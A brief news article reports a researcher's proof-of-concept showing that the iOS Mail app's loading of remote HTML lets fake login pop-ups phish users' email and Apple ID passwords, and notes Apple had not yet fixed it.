Apple’s iOS platform is one of the most secure mobile operating systems in the world, and each release brings new security features and enhancements. iPhones and iPads are proliferating in the workplace at a rapid pace, and even spy agencies tend to have difficulties cracking encrypted communications that originate on an iOS device.
But no software is without flaws, and a new security vulnerability makes iPhones and iPads painfully vulnerable to phishing scams that can easily allow someone to steal your Apple ID username and password.
Ernst and Young security researcher Jan Soucek has built a tool the likes of which could easily trick iPhone and iPad users into handing over the usernames and passwords tied to their email accounts or even Apple IDs.
As noted by The Register, Soucek’s tool takes advantage of a potential flaw in Apple’s iOS Mail app that automatically loads remote HTML content. The researcher has simply created HTML pop-ups that look exactly like the dialog box that appears when an iOS device requires the user to reenter his or her email credentials or Apple ID.
Unsuspecting victims are so used to seeing these dialog boxes, that the odds are good they would just enter their email addresses and passwords without thinking twice. Once this sensitive information is entered and the user taps OK, his or her credentials are sent to a remote server where hackers can access them.
As noted by the researcher, Apple has yet to address the issue.